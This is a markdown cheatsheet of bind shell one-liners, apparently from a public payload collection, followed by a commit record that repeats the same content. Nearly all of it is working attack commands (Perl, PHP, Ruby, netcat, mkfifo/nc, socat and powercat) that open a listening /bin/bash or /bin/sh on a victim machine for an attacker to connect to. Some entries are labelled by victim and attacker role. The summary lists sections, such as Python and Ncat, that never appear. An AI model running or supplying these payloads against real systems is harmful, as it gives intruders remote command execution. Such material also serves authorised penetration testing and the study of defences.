PayloadsAllTheThings/Methodology and Resources/Bind Shell Cheatsheet.md

# Bind Shell

## Summary

* [Reverse Shell](#reverse-shell)
    * [Perl](#perl)
    * [Python](#python)
    * [PHP](#php)
    * [Ruby](#ruby)
    * [Netcat Traditional](#netcat-traditional)
    * [Netcat OpenBsd](#netcat-openbsd)
    * [Ncat](#ncat)
    * [Socat](#socat)
    * [Powershell](#powershell)


## Perl

```perl
perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
```

## PHP

```php
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
    socket_write($cl,$m,strlen($m));}}'
```

## Ruby

```ruby
ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
```

## Netcat Traditional

```powershell
nc -nlvp 51337 -e /bin/bash
```

## Netcat OpenBsd

```powershell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
```

## Socat

```powershell
user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 
user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
```

## Powershell

```powershell
https://github.com/besimorhino/powercat

# Victim (listen)
. .\powercat.ps1
powercat -l -p 7002 -ep

# Connect from attacker
. .\powercat.ps1
powercat -c 127.0.0.1 -p 7002
```
Bind shell cheatsheet (Fix #194) 2020-05-24 12:09:46 +00:00			`# Bind Shell`

			`## Summary`

			`* [Reverse Shell](#reverse-shell)`
			`* [Perl](#perl)`
			`* [Python](#python)`
			`* [PHP](#php)`
			`* [Ruby](#ruby)`
			`* [Netcat Traditional](#netcat-traditional)`
			`* [Netcat OpenBsd](#netcat-openbsd)`
			`* [Ncat](#ncat)`
			`* [Socat](#socat)`
			`* [Powershell](#powershell)`


			`## Perl`

			```perl
			`perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\`
			`bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\`
			`close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'`
			```

			`## PHP`

			```php
			`php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\`
			`socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\`
			`$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\`
			`socket_write($cl,$m,strlen($m));}}'`
			```

			`## Ruby`

			```ruby
			`ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'`
			```

			`## Netcat Traditional`

			```powershell
			`nc -nlvp 51337 -e /bin/bash`
			```

			`## Netcat OpenBsd`

			```powershell
			`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/bash -i 2>&1\|nc -lvp 51337 >/tmp/f`
			```

			`## Socat`

			```powershell
			user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345
			`user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane`
			```

			`## Powershell`

			```powershell
			`https://github.com/besimorhino/powercat`

			`# Victim (listen)`
			`. .\powercat.ps1`
			`powercat -l -p 7002 -ep`

			`# Connect from attacker`
			`. .\powercat.ps1`
			`powercat -c 127.0.0.1 -p 7002`
			```